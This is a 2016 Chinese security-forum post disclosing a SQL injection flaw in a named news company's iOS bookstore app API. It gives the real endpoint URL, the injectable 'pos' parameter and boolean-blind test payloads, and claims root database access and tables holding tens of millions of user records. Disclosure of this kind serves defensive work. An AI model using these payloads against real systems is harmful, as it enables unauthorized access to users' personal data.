HanDs
管理员

[7月漏洞公开] 凤凰网某app存在SQL注入(涉及上千万用户信息) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

详细说明:

目标:凤凰书城IOS APP

检测发现以下地方存在SQL注入:(注入参数pos,布尔盲注/union query)

code 区域
http://appapi.yc.ifeng.com/web/store.php?a=announcement&ct=iOS&pos=1



Payload:

code 区域
http://appapi.yc.ifeng.com/web/store.php?a=announcement&ct=iOS&pos=1 and 1=1



code 区域
http://appapi.yc.ifeng.com/web/store.php?a=announcement&ct=iOS&pos=1 and 1=2

漏洞证明:

1、当前数据库用户,root

user.jpg



2、所有数据库,共16个

dbs.jpg



3、发现大量用户表,合计上千万,具体就不深入了

tb3.jpg



tb2.jpg



tb1.jpg

修复方案:

请多指教~


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
凤凰
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复